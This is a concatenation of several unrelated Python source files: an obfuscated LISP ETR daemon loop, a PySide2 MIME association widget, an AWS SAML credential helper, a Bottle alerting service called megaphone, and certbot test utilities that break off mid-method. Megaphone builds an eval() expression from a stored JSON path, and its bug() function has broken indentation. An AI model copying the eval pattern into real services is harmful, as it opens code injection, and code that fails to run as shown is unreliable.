    "show etr-dynamic-eid": [lispconfig.lisp_show_dynamic_eid_command, {}]
}
if 44 - 44: Oo * OoOO0ooOOoo0O
if 12 - 12: o0000oOoOoO0o . oo % Ooo00oOo00o
if 28 - 28: o0000oOoOoO0o - oo % ooOO00oOo * o0oo0o
if 80 - 80: II11iiII * oooO0oo0oOOOO
if 4 - 4: iIii1I11I1II1 . o0oo0o + II111iiii % OoooooooOO
if 82 - 82: OoooooooOO / Oo * OoOO0ooOOoo0O * O0 . oOoO0oo0OOOo
# ---------------------------------------------------------------------
# Main: start the ETR, then multiplex the data/control socket and the
# lisp-core IPC socket until either yields an empty source (shutdown).
# ---------------------------------------------------------------------
if (o000() == False):
    lisp.lprint("lisp_etr_startup() failed")
    lisp.lisp_print_banner("ETR abnormal exit")
    exit(1)

oOoo00 = [i1111, I11]

while (True):
    # Any select() failure (e.g. socket closed, interrupt) is treated as
    # a shutdown request.
    try: iiI1, oooOOO0o0O0, O0OO0oOO = select.select(oOoo00, [], [])
    except: break

    # Packets arriving on the data/control listen socket.
    if (i1111 in iiI1):
        OoOiII11IiIi, II1iIi11, i11i11II11i, OO0 = lisp.lisp_receive(i1111, False)
        if (II1iIi11 == ""): break

        if (i11i11II11i == lisp.LISP_DATA_PORT):
            OOOO(oOo0oooo00o, OO0, II1iIi11)
        else:
            # RLOC-probes are handled on the pcap path instead.
            if (lisp.lisp_is_rloc_probe_request(OO0[0])):
                lisp.lprint("ETR ignoring RLOC-probe request, using pcap")
                continue

            Ii11iIiiI = lisp.lisp_parse_packet(Oo0o0000o0o0, OO0,
                II1iIi11, i11i11II11i)

            # A true return schedules deferred work on timer threads.
            if (Ii11iIiiI):
                oOOoo00O0O = threading.Timer(0,
                    oOo0O, [None])
                oOOoo00O0O.start()
                o0oOoO00o = threading.Timer(0,
                    ooO0o0Oo, [Oo0o0000o0o0])
                o0oOoO00o.start()

    # IPC messages from the lisp-core process.
    if (I11 in iiI1):
        OoOiII11IiIi, II1iIi11, i11i11II11i, OO0 = lisp.lisp_receive(I11, True)
        if (II1iIi11 == ""): break

        if (OoOiII11IiIi == "command"):
            # Dispatch on a tag embedded in the command payload.
            if (OO0.find("learn%") != -1):
                oo0O(OO0)
            elif (OO0.find("nonce%") != -1):
                iII1ii11III(OO0)
            elif (OO0.find("clear%") != -1):
                lispconfig.lisp_clear_decap_stats(OO0)
            elif (OO0.find("rtr%") != -1):
                OO0OO00ooO0(OO0)
            elif (OO0.find("stats%") != -1):
                OO0 = OO0.split("%")[-1]
                lisp.lisp_process_data_plane_decap_stats(OO0, None)
            else:
                lispconfig.lisp_process_command(I11,
                    OoOiII11IiIi, OO0, "lisp-etr", [Oo00O])
        elif (OoOiII11IiIi == "api"):
            lisp.lisp_process_api("lisp-etr", I11, OO0)
        else:
            if (lisp.lisp_is_rloc_probe_request(OO0[0])):
                lisp.lprint("ETR ignoring RLOC-probe request, using pcap")
                continue
            lisp.lisp_parse_packet(Oo0o0000o0o0, OO0, II1iIi11, i11i11II11i)

oOOoOO0O00o()
lisp.lisp_print_banner("ETR normal exit")
exit(0)
if 90 - 90: Ooo00oOo00o
if 44 - 44: Ooo00oOo00o / oOoO0oo0OOOo . OoO0O00 + oOo0O0Ooo
# dd678faae9ac167bc83abf78e5cb2f3f0688d3a3
|
association_item.py | # -*- coding: future_fstrings -*-
"""
This module defines a single AssociationItem in the AssociationsPanel.
"""
from threading import Thread
from PySide2.QtWidgets import QComboBox
from xdgprefs.gui.mime_item import MimeTypeItem
class AssociationItem(MimeTypeItem):
    """A list item pairing a MIME type with an application selector.

    Extends MimeTypeItem with a combo box listing candidate applications;
    selecting one records the association in the database on a background
    thread so the GUI stays responsive.
    """

    def __init__(self, mime_type, apps, main_window, listview):
        """
        :param mime_type: MIME type object (must expose ``identifier``).
        :param apps: iterable of application names for the combo box.
        :param main_window: window providing ``status`` and ``assocdb``.
        :param listview: parent list view, forwarded to MimeTypeItem.
        """
        MimeTypeItem.__init__(self, mime_type, listview)
        self.apps = apps
        self.main_window = main_window

        self.selector = QComboBox()
        self.selector.addItems(self.apps)
        self.selector.currentTextChanged.connect(self._on_selected)
        self.hbox.addWidget(self.selector, 2)

    def _on_selected(self, _):
        """Persist the newly selected app for this MIME type asynchronously."""
        mime = self.mime_type.identifier
        app = self.selector.currentText()
        self.main_window.status.showMessage(f'Setting {mime} to {app}...')

        def run():
            success = self.main_window.assocdb.set_app_for_mimetype(mime, app)
            if success:
                msg = f'{app} was successfully set to open {mime}.'
            else:
                msg = f'Could not set {app} to open {mime}, please check ' \
                      f'the logs!'
            self.main_window.status.showMessage(msg)

        # daemon=True so a pending database write cannot keep the
        # process alive after the GUI has been closed.
        t = Thread(target=run, daemon=True)
        t.start()

    def __hash__(self):
        # Hash on the MIME type so items can key sets/dicts by type.
        return hash(self.mime_type)
|
amazon.py | #!/usr/bin/env python
import base64
import os
import boto3
from datetime import datetime
from threading import Thread
from botocore.exceptions import ProfileNotFound
from lxml import etree
from aws_google_auth.google import ExpectedGoogleException
class Amazon:
    """Exchange a (Google-obtained) SAML assertion for AWS STS credentials."""

    def __init__(self, config, saml_xml):
        """
        :param config: settings object providing region, role_arn,
                       provider and duration.
        :param saml_xml: raw SAML assertion bytes.
        """
        self.config = config
        self.saml_xml = saml_xml
        self.__token = None  # cached assume_role_with_saml response

    @property
    def sts_client(self):
        """Build an STS client, temporarily hiding AWS_PROFILE so boto3
        does not require the named profile to exist locally."""
        try:
            profile = os.environ.get('AWS_PROFILE')
            if profile is not None:
                del os.environ['AWS_PROFILE']
            client = boto3.client('sts', region_name=self.config.region)
            if profile is not None:
                os.environ['AWS_PROFILE'] = profile
            return client
        except ProfileNotFound as ex:
            raise ExpectedGoogleException("Error : {}.".format(ex))

    @property
    def base64_encoded_saml(self):
        """The SAML assertion, base64-encoded as ASCII text."""
        return base64.b64encode(self.saml_xml).decode("utf-8")

    @property
    def token(self):
        """STS credentials; fetched once and cached for this object."""
        if self.__token is None:
            self.__token = self.sts_client.assume_role_with_saml(
                RoleArn=self.config.role_arn,
                PrincipalArn=self.config.provider,
                SAMLAssertion=self.base64_encoded_saml,
                DurationSeconds=self.config.duration)
        return self.__token

    @property
    def access_key_id(self):
        return self.token['Credentials']['AccessKeyId']

    @property
    def secret_access_key(self):
        return self.token['Credentials']['SecretAccessKey']

    @property
    def session_token(self):
        return self.token['Credentials']['SessionToken']

    @property
    def expiration(self):
        return self.token['Credentials']['Expiration']

    def print_export_line(self):
        """Print a shell 'export' line for the fetched credentials."""
        export_template = "export AWS_ACCESS_KEY_ID='{}' AWS_SECRET_ACCESS_KEY='{}' AWS_SESSION_TOKEN='{}' AWS_SESSION_EXPIRATION='{}'"
        formatted = export_template.format(
            self.access_key_id,
            self.secret_access_key,
            self.session_token,
            self.expiration.strftime('%Y-%m-%dT%H:%M:%S%z'))
        print(formatted)

    @property
    def roles(self):
        """Map role ARN -> principal (provider) ARN, parsed from the
        assertion's Role attribute values ("role,principal" pairs)."""
        doc = etree.fromstring(self.saml_xml)
        roles = {}
        for x in doc.xpath('//*[@Name = "https://aws.amazon.com/SAML/Attributes/Role"]//text()'):
            if "arn:aws:iam:" in x:
                res = x.split(',')
                roles[res[0]] = res[1]
        return roles

    def resolve_aws_aliases(self, roles):
        """Resolve account aliases for each role in parallel.

        Returns {account_id: alias} (falling back to the account id when
        no alias is readable).
        """
        def resolve_aws_alias(role, principal, aws_dict):
            session = boto3.session.Session(region_name=self.config.region)
            sts = session.client('sts')
            saml = sts.assume_role_with_saml(RoleArn=role,
                                             PrincipalArn=principal,
                                             SAMLAssertion=self.base64_encoded_saml)
            iam = session.client('iam',
                                 aws_access_key_id=saml['Credentials']['AccessKeyId'],
                                 aws_secret_access_key=saml['Credentials']['SecretAccessKey'],
                                 aws_session_token=saml['Credentials']['SessionToken'])
            try:
                response = iam.list_account_aliases()
                account_alias = response['AccountAliases'][0]
                aws_dict[role.split(':')[4]] = account_alias
            except Exception:
                # No alias configured or no iam:ListAccountAliases
                # permission: fall back to the numeric account id.
                sts = session.client('sts',
                                     aws_access_key_id=saml['Credentials']['AccessKeyId'],
                                     aws_secret_access_key=saml['Credentials']['SecretAccessKey'],
                                     aws_session_token=saml['Credentials']['SessionToken'])
                account_id = sts.get_caller_identity().get('Account')
                aws_dict[role.split(':')[4]] = '{}'.format(account_id)

        threads = []
        aws_id_alias = {}
        for role, principal in roles.items():
            t = Thread(target=resolve_aws_alias, args=(role, principal, aws_id_alias))
            t.start()
            threads.append(t)
        for t in threads:
            t.join()
        return aws_id_alias

    @staticmethod
    def is_valid_saml_assertion(saml_xml):
        """Return True iff *saml_xml* parses and 'now' falls inside the
        assertion's NotBefore/NotOnOrAfter validity window; False for
        None, unparsable input, or an expired/not-yet-valid assertion."""
        if saml_xml is None:
            return False
        try:
            doc = etree.fromstring(saml_xml)
            conditions = list(doc.iter(tag='{urn:oasis:names:tc:SAML:2.0:assertion}Conditions'))
            not_before_str = conditions[0].get('NotBefore')
            not_on_or_after_str = conditions[0].get('NotOnOrAfter')
            # Naive UTC comparison; the timestamps carry a literal 'Z'.
            now = datetime.utcnow()
            not_before = datetime.strptime(not_before_str, "%Y-%m-%dT%H:%M:%S.%fZ")
            not_on_or_after = datetime.strptime(not_on_or_after_str, "%Y-%m-%dT%H:%M:%S.%fZ")
            return not_before <= now < not_on_or_after
        except Exception:
            return False
|
megaphone.py | #!/usr/bin/env python
"""Megaphone is an alerting consolidation service."""
import json
import sys
import os
import re
from bottle import Bottle
import time
import urllib2
import shutil
import bottle
from ConfigParser import SafeConfigParser
import logging
import multiprocessing
logging.basicConfig()
app = Bottle()
_basedir = os.path.abspath(os.path.dirname(__file__))
# Configuration resolution, lowest to highest precedence:
#   1. hard-coded defaults (the try/except NameError-style blocks below)
#   2. megaphone.conf sitting next to this file
#   3. MEGAPHONE_* environment variables
config = SafeConfigParser()
try:
    config.read('%s/megaphone.conf' % _basedir)
    DEBUG = config.getboolean('settings', 'DEBUG')
    QUIET = config.getboolean('settings', 'QUIET')
    CACHEDIR = config.get('settings', 'CACHEDIR')
    CACHEFILE = config.get('settings', 'CACHEFILE')
    WSGISERVER = config.get('settings', 'WSGISERVER')
    CACHE = "%s/%s" % (CACHEDIR, CACHEFILE)
    LISTEN = config.get('settings', 'LISTEN')
    PORT = config.get('settings', 'PORT')
    TIMEOUT = float(config.get('settings', 'TIMEOUT'))
except:
    print "INFO: unable to find config file, skipping"
# Environment overrides. NOTE(review): env values arrive as strings, so
# MEGAPHONE_DEBUG/QUIET become truthy strs (not bools) and
# MEGAPHONE_TIMEOUT stays a str (never passed through float()) -- confirm
# downstream consumers tolerate that.
if "MEGAPHONE_DEBUG" in os.environ:
    DEBUG = os.environ["MEGAPHONE_DEBUG"]
if "MEGAPHONE_QUIET" in os.environ:
    QUIET = os.environ["MEGAPHONE_QUIET"]
if "MEGAPHONE_WSGISERVER" in os.environ:
    WSGISERVER = os.environ["MEGAPHONE_WSGISERVER"]
if "MEGAPHONE_CACHE" in os.environ:
    CACHE = os.environ["MEGAPHONE_CACHE"]
if "MEGAPHONE_LISTEN" in os.environ:
    LISTEN = os.environ["MEGAPHONE_LISTEN"]
if "MEGAPHONE_PORT" in os.environ:
    PORT = os.environ["MEGAPHONE_PORT"]
if "MEGAPHONE_TIMEOUT" in os.environ:
    TIMEOUT = os.environ["MEGAPHONE_TIMEOUT"]
# Fall back to built-in defaults for anything still undefined (each bare
# name raises NameError when neither the config file nor the environment
# provided a value).
try:
    DEBUG
except:
    DEBUG = False
try:
    QUIET
except:
    QUIET = True
try:
    WSGISERVER
except:
    WSGISERVER = "default"
try:
    LISTEN
except:
    LISTEN = "0.0.0.0"
try:
    CACHE
except:
    CACHE = "/tmp/megaphone.json"
try:
    PORT
except:
    PORT = "18001"
try:
    TIMEOUT
except:
    TIMEOUT = 10
def bug(msg):
"""Print debug output."""
if DEBUG:
print "DEBUG: %s" % msg
class MyException(Exception):
    """Dedicated exception type raised so unit tests can catch it precisely."""
# Timestamp stamped onto every status response. NOTE(review): computed once
# at import and never refreshed, so long-running processes report a stale
# 'date' -- confirm whether that is intended.
ts = time.strftime('%Y-%m-%dT%H:%M:%S%Z', time.localtime())
# Change working directory so relative paths (and template lookup) work again
root = os.path.join(os.path.dirname(__file__))
sys.path.insert(0, root)
# Reload previously registered checks from the JSON cache, if one exists.
if os.path.isfile(CACHE):
    bug("CACHE: %s" % CACHE)
    with open(CACHE) as data_file:
        checks = json.load(data_file)
else:
    checks = {}
# we shouldn't write to tmp by default because our megaphone.json could get deleted by tmpwatch
if CACHE == "/tmp/megaphone.json":
    print "WARNING: cache set to %s, could get clobbered by tmpwatch!" % CACHE
def writecache(data):
    """Persist *data* (the checks dict) to the JSON cache file at CACHE.

    An existing cache is first copied aside to CACHE.backup so a partially
    written file can be recovered manually. On any failure a '--global'
    error marker is recorded in the in-memory checks dict so the main
    status endpoint surfaces the problem as Critical.
    """
    try:
        if os.path.isfile(CACHE):
            backup = "%s.backup" % CACHE
            shutil.copyfile(CACHE, backup)
        with open(CACHE, 'w') as outfile:
            json.dump(data, outfile)
    except Exception:
        # it's bad news if we can't create a cache file to reload on restart,
        # throw an error in megaphone!
        # BUG FIX: the original called writecache(checks) again here; while
        # the cache stays unwritable that recursed without bound. Recording
        # the marker in memory is enough -- it is served by getallstatus().
        print("ERROR: cache creation failed!")
        checks['--global'] = "ERROR: cache creation failed!"
# generate nested python dictionaries, copied from here:
# http://stackoverflow.com/questions/635483/what-is-the-best-way-to-implement-nested-dictionaries-in-python
class AutoVivification(dict):
    """dict subclass that transparently creates nested dicts on missing keys.

    Mirrors Perl's autovivification: reading an absent key stores and
    returns a fresh AutoVivification, so deep assignments like
    ``d['a']['b'] = 1`` work without pre-creating intermediate levels.
    """

    def __getitem__(self, item):
        if item not in self:
            self[item] = type(self)()
        return dict.__getitem__(self, item)
# read a file
def readfile(fname):
    """Return the contents of *fname* with NUL bytes replaced by spaces.

    On any read error a "Critical: ..." message string is returned instead
    of raising, so a broken file surfaces as a check failure upstream.
    """
    try:
        # BUG FIX: the original leaked the file handle -- f.close() sat
        # after the return statement and was never reached. The context
        # manager guarantees the close.
        with open(fname, 'r') as f:
            return re.sub(r'\0', ' ', f.read())
    except Exception:
        return "Critical: reading %s failed!" % fname
# read a megaphone compatible status url and return the object
def readstatus(name,url,q):
    """Fetch one check's status and queue (or return) the resulting dict.

    :param name: check id, used as the key of the queued {name: data} result
    :param url: either a plain status-URL string, or a dict with 'addr'
        plus optional 'jsonpath' (slash-separated path to the status value)
        and 'statusoverride' keys
    :param q: multiprocessing.Queue to put {name: data} on; if falsy, the
        data dict is returned directly instead (direct-call mode)
    """
    bug("now in readstatus")
    result = {}
    validstatus = ["OK", "Unknown", "Warning", "Critical"]
    # this is to support status somewhere other than 'status' under the root of a service
    # {"id": "ok2_status", "url": {"addr": "http://localhost:18999/status", "jsonpath": "megaphone/status"}}
    if isinstance(url, dict):
        bug("url is a dictionary")
        data = AutoVivification()
        if 'addr' not in url:
            mymsg = "ERROR: couldn't find addr in url, nothing to check"
            bug(mymsg)
            data['status'] = "Critical"
            data['message'] = mymsg
        else:
            if 'jsonpath' in url:
                bug("parsing jsonpath and addr in url: jsonpath: %s, addr: %s" % (url['jsonpath'],url['addr']))
                try:
                    tdata = json.load(urllib2.urlopen(url['addr'], timeout = TIMEOUT))
                    # Walk the slash-separated jsonpath by building an index
                    # expression ("tdata['a']['b']") and eval()ing it.
                    # NOTE(review): eval on a stored path is fragile, and
                    # unsafe if untrusted users can register checks -- a
                    # plain loop of dict lookups would do the same job.
                    v = "tdata"
                    for i in url['jsonpath'].split("/"):
                        bug("i: %s" % i)
                        if i:
                            v += "['%s']" % i
                    bug("eval type:")
                    if DEBUG:
                        print type(eval(v))
                        print type(eval(v).encode('ascii','ignore'))
                    data['status'] = eval(v)
                    data['date'] = ts
                    msg = "Status from path %s: %s" % (url['jsonpath'], data['status'])
                    bug(msg)
                    data['message'] = msg
                except:
                    msg = "error collecting results from addr: %s, jsonpath: %s" % (url['addr'],url['jsonpath'])
                    bug(msg)
                    data['status'] = "Critical"
                    data['date'] = ts
                    data['message'] = msg
            else:
                bug("no jsonpath detected in url, using only addr path")
                try:
                    data = json.load(urllib2.urlopen(url['addr'], timeout = TIMEOUT))
                except:
                    msg = "timeout connecting to %s" % (url['addr'])
                    bug(msg)
                    data['status'] = "Critical"
                    data['date'] = ts
                    data['message'] = msg
            # statusoverride replaces whatever the endpoint reported.
            if 'statusoverride' in url:
                bug("statusoverride detected in url")
                if url['statusoverride'] not in validstatus:
                    data['status'] = "Critical"
                    data['message'] = "ERROR: invalid status '%s' written to statusoverride!" % url['statusoverride']
                else:
                    data['status'] = url['statusoverride']
                    data['message'] = "NOTICE: statusoverride used!"
    else:
        bug("url object isn't a dictionary, processing normally")
        try:
            data = json.load(urllib2.urlopen(url, timeout = TIMEOUT))
        except:
            data = AutoVivification()
            msg = "timeout connecting to %s" % (url)
            bug(msg)
            data['status'] = "Critical"
            data['date'] = ts
            data['message'] = msg
    # Normalize: every result must carry a status from validstatus.
    if "status" not in data.keys():
        data['status'] = "Critical"
        data['message'] = "No status was found on given path!"
    if data["status"] not in validstatus:
        data['status'] = "Critical"
        data['message'] = "ERROR: status value '%s' not valid!" % data["status"]
    bug("Data:")
    if DEBUG:
        print data
    result[name] = data
    if DEBUG:
        print result
        print type(name)
        print type(result)
    # Worker mode hands the result back on the queue; direct mode returns it.
    if q:
        q.put(result)
    else:
        return data
def returnmsg(x, st):
    """Return the check result's message, or a default naming state *st*.

    :param dict x: one check's result dict (may lack a 'message' key)
    :param str st: state label used in the fallback text
    """
    # BUG FIX: the original had a bug(...) call after the return statements
    # referencing an undefined name 'mymsg'; it was unreachable dead code
    # and has been removed.
    if 'message' not in x.keys():
        return "Detected %s state [no message specified]" % st
    return x['message']
def getallstatus():
    """Aggregate every registered check into one megaphone status dict.

    Runs all checks in parallel via multiprocessing, counts results per
    state, and reports the most severe state seen (Unknown < Warning <
    Critical) with a '|'-joined message per non-OK check. A check with the
    id '--global' short-circuits everything and forces Critical.
    """
    bug("Checks:")
    if DEBUG:
        print checks
    data = AutoVivification()
    # setting a global override. If there is a check with the id '--global',
    # only respect that. Always return Critical with a message of whatever is
    # in the url object
    if "--global" in checks.keys():
        bug("Found a global valuse in keys!")
        data['status'] = "Critical"
        data['message'] = checks['--global']
        data['date'] = ts
        return data
    # if there's no global override, parse the rest of the checks.
    else:
        # trying to conform to current monitoring status guidelines
        # http://nagiosplug.sourceforge.net/developer-guidelines.html#PLUGOUTPUT
        statusc = {
            "Warning": 0,
            "Critical": 0,
            "Unknown": 0,
            "OK": 0,
        }
        E = 0
        msg = ""
        # run all the checks in parallel
        q = multiprocessing.Queue()
        jobs = [multiprocessing.Process(target=readstatus, args=(i,checks[i],q,)) for i in checks.keys()]
        for job in jobs: job.start()
        for job in jobs: job.join()
        results = [q.get() for i in checks.keys()]
        bug("Results:")
        print results
        for y in results:
            # Each queued result is a single-entry {name: data} dict.
            i, x = y.popitem()
            # for all checks we're monitoring, capture the state and the message
            # figure out something to do with date testing
            # like throw an error if current date is > 5min from returned date
            bug("checking %s" % i)
            bug("check status response:")
            if DEBUG:
                print x
            stattypes = ["Warning", "Critical", "OK"]
            if x['status'] in stattypes:
                bug("Detected %s status" % x['status'])
                mymsg = returnmsg(x,x['status'])
                bug("mymsg: %s" % mymsg)
                statusc[x['status']] = statusc[x['status']] + 1
                if x['status'] != "OK":
                    msg += "%s:%s:%s|" % (i, x['status'], mymsg)
            else:
                mymsg = returnmsg(x,"Unknown")
                # things aren't Warning, Critical, or OK so something else is going on
                statusc['Unknown'] = statusc['Unknown'] + 1
                msg += "%s:%s:%s|" % (i, x['status'], mymsg)
        bug("All checks are checked!")
        # set the status to the most critical value in the order: Unknown, Warning, Critical
        # i.e. if WARNING is the worst issue, i present that, but if ERROR and
        # WARNING are both present use ERROR
        bug("finished all checks. Aggregating")
        if statusc['Unknown'] > 0:
            data['status'] = "Unknown"
            E = 1
            bug("Setting state to Unknown")
        if statusc['Warning'] > 0:
            data['status'] = "Warning"
            E = 1
            bug("Setting state to Warning")
        if statusc['Critical'] > 0:
            data['status'] = "Critical"
            E = 1
            bug("Setting state to Critical")
        # trim the value of msg since we're appending and adding ';' at the end for errors
        bug("E: %s" % str(E))
        if E > 0:
            data['message'] = msg[:-1]
            bug("final message - %s" % msg[:-1])
        else:
            if len(checks.keys()) > 0:
                bug("All checks are OK!")
                # we didn't find any error states, so we're OK
                data['status'] = "OK"
                data['message'] = "Everything is OK!"
            else:
                data['status'] = "Unknown"
                data['message'] = "No checks are registered!"
                bug("No checks are registered!")
        bug("adding timestamp")
        data['date'] = ts
        bug("results are in:")
        if DEBUG:
            print data
        return data
# list all megaphone checks
@app.get('/checks')
def list():
    """Return the registered checks dict (bottle serializes it as JSON)."""
    # FIX: dropped an unused 'data = AutoVivification()' local. The name
    # 'list' shadows the builtin, but it is kept because bottle registered
    # the route under this function.
    return checks
# add a check: {"id": "ok_status", "url": "http://localhost:18999/status"}
@app.post('/checks')
def add_submit():
    """Register a check from a JSON body: {"id": "ok_status", "url": ...}.

    Responds 400 when the body is empty, has no 'id', or has no 'url'.
    """
    data = bottle.request.body.readline()
    if not data:
        # BUG FIX: Bottle instances have no .abort() method -- abort() is a
        # module-level helper, so app.abort(...) raised AttributeError.
        bottle.abort(400, 'No data received')
    entity = json.loads(data)
    if 'id' not in entity:
        bottle.abort(400, 'No id specified')
    try:
        checks[entity["id"]] = entity["url"]
        writecache(checks)
    except KeyError:
        # 'url' missing from the payload (writecache handles its own errors).
        bottle.abort(400, "Error adding new check!")
# delete a check: {"id": "ok_status"}
@app.delete('/checks/:s')
def delcheck(s):
    """Unregister check *s* (e.g. DELETE /checks/ok_status) and persist."""
    try:
        del checks[s]
        writecache(checks)
    except KeyError:
        # BUG FIX: bottle.abort() is the module-level helper; Bottle
        # instances have no .abort(), so app.abort raised AttributeError.
        # Also narrowed the bare except to the failure actually expected
        # here (unknown check id).
        bottle.abort(400, "Error deleting check!")
# proxy the response of a status url megaphone is checking
@app.get('/checks/:s')
def checkshow(s):
    """Proxy the live status response of registered check *s*.

    Dict-style checks are fetched via their 'addr' (honoring any
    'statusoverride'); plain-string checks are fetched directly.
    """
    if s not in checks.keys():
        return "Sorry, no check %s registered!" % s
    if isinstance(checks[s], dict):
        if 'addr' not in checks[s]:
            return "Sorry, can't find a valid endpoint in your check!"
        try:
            res = json.load(urllib2.urlopen(checks[s]['addr'], timeout=TIMEOUT))
            if 'statusoverride' in checks[s]:
                res['status'] = checks[s]['statusoverride']
                res['message'] = "NOTICE: statusoverride used!"
            return res
        except Exception:
            return "Error connecting to: %s" % checks[s]['addr']
    try:
        return json.load(urllib2.urlopen(checks[s], timeout=TIMEOUT))
    except Exception:
        # BUG FIX: checks[s] is a plain URL string in this branch; the old
        # code indexed it with ['addr'], raising TypeError instead of
        # returning the error message.
        return "Error connecting to: %s" % checks[s]
# generate the main status output
@app.get('/')
def status():
    """Serve the aggregated status of every registered check at the root."""
    aggregated = getallstatus()
    return aggregated
if __name__ == '__main__':
    # Stand-alone entry point: serve on LISTEN:PORT, optionally with a
    # non-default WSGI backend named in the config (WSGISERVER).
    try:
        if WSGISERVER != 'default':
            app.run(host=LISTEN, port=PORT, debug=DEBUG, quiet=QUIET, server=WSGISERVER)
        else:
            app.run(host=LISTEN, port=PORT, debug=DEBUG, quiet=QUIET)
    except KeyboardInterrupt:
        sys.exit("Aborted by Ctrl-C!")
|
util.py | """Test utilities.
.. warning:: This module is not part of the public API.
"""
import logging
import multiprocessing
import os
import pkg_resources
import shutil
import stat
import tempfile
import unittest
import sys
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
import mock
import OpenSSL
import josepy as jose
import six
from six.moves import reload_module # pylint: disable=import-error
from certbot import constants
from certbot import interfaces
from certbot import storage
from certbot import util
from certbot import configuration
from certbot.display import util as display_util
def vector_path(*names):
    """Path to a test vector under this package's testdata directory."""
    relative = os.path.join('testdata', *names)
    return pkg_resources.resource_filename(__name__, relative)
def load_vector(*names):
    """Load a test vector's bytes, normalizing CRLF to LF for text files."""
    # resource_string conveniently opens the file in binary mode.
    raw = pkg_resources.resource_string(
        __name__, os.path.join('testdata', *names))
    try:
        # Text vector: normalize line endings so tests are platform-stable.
        return raw.decode().replace('\r\n', '\n').encode()
    except ValueError:
        # Not decodable with the default encoding -- most likely a binary
        # (e.g. DER) vector; hand its bytes back untouched.
        return raw
def _guess_loader(filename, loader_pem, loader_der):
_, ext = os.path.splitext(filename)
if ext.lower() == '.pem':
return loader_pem
elif ext.lower() == '.der':
return loader_der
else: # pragma: no cover
raise ValueError("Loader could not be recognized based on extension")
def load_cert(*names):
    """Load an X.509 certificate test vector."""
    filetype = _guess_loader(
        names[-1], OpenSSL.crypto.FILETYPE_PEM, OpenSSL.crypto.FILETYPE_ASN1)
    return OpenSSL.crypto.load_certificate(filetype, load_vector(*names))
def load_csr(*names):
    """Load a certificate signing request test vector."""
    filetype = _guess_loader(
        names[-1], OpenSSL.crypto.FILETYPE_PEM, OpenSSL.crypto.FILETYPE_ASN1)
    return OpenSSL.crypto.load_certificate_request(filetype, load_vector(*names))
def load_comparable_csr(*names):
    """Load a CSR test vector wrapped as a josepy ComparableX509."""
    csr = load_csr(*names)
    return jose.ComparableX509(csr)
def load_rsa_private_key(*names):
    """Load an RSA private key vector as a josepy ComparableRSAKey."""
    loader = _guess_loader(names[-1], serialization.load_pem_private_key,
                           serialization.load_der_private_key)
    key = loader(load_vector(*names), password=None, backend=default_backend())
    return jose.ComparableRSAKey(key)
def load_pyopenssl_private_key(*names):
    """Load a pyOpenSSL private key test vector."""
    filetype = _guess_loader(
        names[-1], OpenSSL.crypto.FILETYPE_PEM, OpenSSL.crypto.FILETYPE_ASN1)
    return OpenSSL.crypto.load_privatekey(filetype, load_vector(*names))
def skip_unless(condition, reason):  # pragma: no cover
    """Skip tests unless a condition holds.

    Provides the basic behavior of ``unittest.skipUnless`` even on ancient
    unittest versions (pre-Python 2.7) that lack it.

    :param bool condition: If ``False``, the test will be skipped
    :param str reason: the reason for skipping the test

    :rtype: callable
    :returns: decorator that hides tests unless condition is ``True``
    """
    native_skip = getattr(unittest, "skipUnless", None)
    if native_skip is not None:
        return native_skip(condition, reason)
    if condition:
        return lambda cls: cls
    return lambda cls: None
def make_lineage(config_dir, testfile):
    """Creates a lineage defined by testfile.

    This creates the archive, live, and renewal directories if
    necessary and creates a simple lineage.

    :param str config_dir: path to the configuration directory

    :param str testfile: configuration file to base the lineage on

    :returns: path to the renewal conf file for the created lineage
    :rtype: str

    """
    lineage_name = testfile[:-len('.conf')]

    conf_dir = os.path.join(
        config_dir, constants.RENEWAL_CONFIGS_DIR)
    archive_dir = os.path.join(
        config_dir, constants.ARCHIVE_DIR, lineage_name)
    live_dir = os.path.join(
        config_dir, constants.LIVE_DIR, lineage_name)

    for directory in (archive_dir, conf_dir, live_dir,):
        if not os.path.exists(directory):
            os.makedirs(directory)

    # Populate the archive from the sample vectors, then point each live/
    # symlink at version 1 of its archive file.
    sample_archive = vector_path('sample-archive')
    for kind in os.listdir(sample_archive):
        shutil.copyfile(os.path.join(sample_archive, kind),
                        os.path.join(archive_dir, kind))

    for kind in storage.ALL_FOUR:
        os.symlink(os.path.join(archive_dir, '{0}1.pem'.format(kind)),
                   os.path.join(live_dir, '{0}.pem'.format(kind)))

    # NOTE(review): conf_dir is already rooted at config_dir, so joining
    # config_dir again is redundant (os.path.join keeps only conf_dir when
    # it is absolute) -- harmless, but worth confirming the intent.
    conf_path = os.path.join(config_dir, conf_dir, testfile)
    # Instantiate the template: every MAGICDIR placeholder becomes the
    # caller's config_dir.
    with open(vector_path(testfile)) as src:
        with open(conf_path, 'w') as dst:
            dst.writelines(
                line.replace('MAGICDIR', config_dir) for line in src)

    return conf_path
def patch_get_utility(target='zope.component.getUtility'):
    """Patch zope.component.getUtility to use a special mock IDisplay.

    The mock IDisplay works like a regular mock object, except it also
    asserts that methods are called with valid arguments.

    :param str target: path to patch

    :returns: mock zope.component.getUtility
    :rtype: mock.MagicMock
    """
    factory = _create_get_utility_mock
    return mock.patch(target, new_callable=factory)
def patch_get_utility_with_stdout(target='zope.component.getUtility',
                                  stdout=None):
    """Patch zope.component.getUtility to use a special mock IDisplay.

    Like :func:`patch_get_utility`, but the ``message`` argument passed to
    each IDisplay method is additionally written to *stdout*.

    :param str target: path to patch
    :param object stdout: object to write standard output to; it is
        expected to have a ``write`` method (defaults to a fresh
        ``six.StringIO``)

    :returns: mock zope.component.getUtility
    :rtype: mock.MagicMock
    """
    sink = stdout if stdout else six.StringIO()
    frozen = _create_get_utility_mock_with_stdout(sink)
    return mock.patch(target, new=frozen)
class FreezableMock(object):
    """Mock object with the ability to freeze attributes.

    This class works like a regular mock.MagicMock object, except
    attributes and behavior set before the object is frozen cannot
    be changed during tests.

    If a func argument is provided to the constructor, this function
    is called first when an instance of FreezableMock is called,
    followed by the usual behavior defined by MagicMock. The return
    value of func is ignored.

    """
    def __init__(self, frozen=False, func=None, return_value=mock.sentinel.DEFAULT):
        # 'freeze' must stay reachable on an unfrozen instance, so it is
        # pre-registered in the set of names served from self (rather than
        # proxied to the MagicMock).
        self._frozen_set = set() if frozen else set(('freeze',))
        self._func = func
        self._mock = mock.MagicMock()
        if return_value != mock.sentinel.DEFAULT:
            self.return_value = return_value
        # Assigned last: until this exists, __getattribute__ treats the
        # object as unfrozen (see the AttributeError fallback below).
        self._frozen = frozen

    def freeze(self):
        """Freeze object preventing further changes."""
        self._frozen = True

    def __call__(self, *args, **kwargs):
